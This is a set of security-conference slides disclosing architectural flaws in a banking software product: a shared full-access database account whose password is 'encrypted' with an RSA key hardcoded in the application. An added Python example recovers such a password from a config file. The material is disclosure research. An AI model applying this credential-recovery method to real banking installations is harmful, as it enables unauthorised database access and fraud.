Gleb Cherbov - DBO Hacking — arch bugs in BSS

Page 1

Arch bugs in BSS

Gleb Cherbov, Security Researcher, Digital Security (ERPScan)

Page 2

© 2002—2013, Digital Security

Banking

Page 3

Internet banking. Client side

Page 4

How it works

(architecture diagram) ABS (the bank's core banking system); WEB Server + App Server; DBMS; Operator's environment; Operator

Page 8

Select a target

(same architecture diagram: ABS; WEB Server + App Server; DBMS; Operator's environment; Operator)

Attack paths marked on the diagram: SQL injection; Insider attack

Page 11

Authentication

(diagram) Operator --(oper_login / oper_pass)--> Operator's environment --(dbo_admin)--> DBMS

Page 12

dbo_admin

• dbo_admin is the only account at the DBMS
• dbo_admin has full access
• every operator can connect to the DBMS directly
• operator authentication happens on the application side

Page 13

Looking for the password

The dbo_admin password is encrypted and stored in a .cfg file near the app.

Page 14

Quote

"it's impossible to decrypt it" (c) BSS support

Page 15

Let's take a look

(annotated screenshot of the application) RSA modulus; RSA private exponent; unusual base64 alphabet

Page 16

Let's take a look

(screenshot of the stored value) Well… looks like base64?

Page 17

Also…

Innovative password storage widely used in BSS products, with the same hardcoded RSA key.

Page 18

Malware

(same architecture diagram: ABS; WEB Server + App Server; DBMS; Operator's environment; Operator)

Get the config file

Decrypt the dbo_admin password

Wreak havoc
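The recovery chain from pages 15 to 18 (undo the non-standard base64 alphabet, then RSA-decrypt with the modulus and private exponent that ship inside the application, then log in as dbo_admin), written out as an added Python example. This is not BSS code and not the speaker's tooling: the RSA key, the alphabet, the .cfg layout and the sample password are all constructed here for illustration, and the assumption that the vendor format is textbook RSA without padding followed by custom-alphabet base64 is exactly that, an assumption.

```python
"""Recovering an application password that is "encrypted" with a key
shipped inside the application.

Added example, not code from BSS or from the talk.  The RSA key, the
base64 alphabet, the .cfg layout and the password are constructed here
for illustration; the scheme (textbook RSA without padding, then base64
with a non-standard alphabet) is an assumption about the vendor format.
"""
import base64

# Hypothetical hardcoded key, as an attacker would lift it from the binary.
# Two Mersenne primes keep the example self-contained; key size does not
# matter when the private exponent is distributed with the software.
P = 2**61 - 1
Q = 2**89 - 1
N = P * Q                            # "RSA modulus" seen in the binary
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))    # "RSA private exp" seen in the binary
N_BYTES = (N.bit_length() + 7) // 8

STD_ALPHABET = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz0123456789+/")
# Hypothetical "unusual base64 alphabet": a permutation of the standard one.
CUSTOM_ALPHABET = STD_ALPHABET[::-1]


def custom_b64encode(raw: bytes) -> str:
    """Standard base64, then swap in the vendor alphabet ('=' stays '=')."""
    table = str.maketrans(STD_ALPHABET, CUSTOM_ALPHABET)
    return base64.b64encode(raw).decode("ascii").translate(table)


def custom_b64decode(text: str) -> bytes:
    """Map the vendor alphabet back onto the standard one, then decode."""
    table = str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET)
    return base64.b64decode(text.translate(table), validate=True)


def rsa_encrypt(plaintext: bytes) -> bytes:
    """Textbook RSA (no padding) with the public exponent; N_BYTES output."""
    m = int.from_bytes(plaintext, "big")
    if not 0 < m < N:
        raise ValueError("plaintext must be non-empty and shorter than N")
    return pow(m, E, N).to_bytes(N_BYTES, "big")


def rsa_decrypt(ciphertext: bytes) -> bytes:
    """Invert rsa_encrypt with the private exponent lifted from the binary.

    Unpadded RSA cannot preserve leading 0x00 bytes; passwords never start
    with one, so the minimal big-endian encoding is the original plaintext.
    """
    m = pow(int.from_bytes(ciphertext, "big"), D, N)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def protect_password(password: str) -> str:
    """What the application is assumed to do when writing the .cfg value."""
    return custom_b64encode(rsa_encrypt(password.encode("utf-8")))


def recover_password(cfg_text: str, key: str = "DBPassword") -> str:
    """Parse a key=value .cfg, undo the custom base64, RSA-decrypt the value."""
    for line in cfg_text.splitlines():
        line = line.strip()
        if not line or line.startswith((";", "#")):
            continue
        name, sep, value = line.partition("=")
        if sep and name.strip() == key:
            return rsa_decrypt(custom_b64decode(value.strip())).decode("utf-8")
    raise KeyError(f"{key} not found in configuration")


# Constructed sample configuration file (not a real BSS .cfg).
SAMPLE_CFG = (
    "; constructed sample, not a real configuration file\n"
    "DBServer=dbo-sql01\n"
    "DBUser=dbo_admin\n"
    "DBPassword=" + protect_password("Sup3r$ecret!") + "\n"
)

if __name__ == "__main__":
    print("stored :", SAMPLE_CFG.splitlines()[-1])
    print("secret :", recover_password(SAMPLE_CFG))
```

Whatever cipher the vendor picks, the application must hold the decryption key to read its own configuration at startup, so anyone with a copy of the application files and the .cfg (the insider, the targeted attacker or the malware of page 19) repeats the same three calls. "Impossible to decrypt" only holds for someone who does not have the binary, and a hardcoded key shared across products turns one reverse-engineering effort into a skeleton key for every installation.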

Page 19

Attack vector?

• Insider
• Targeted attack
• Malware

Page 20

Tricky data manipulations

Page 21

Questions?

Digital Security in Moscow: +7 (495) 223-07-86
Digital Security in Saint Petersburg: +7 (812) 703-15-47

www.dsec.ru
www.erpscan.com

[email protected]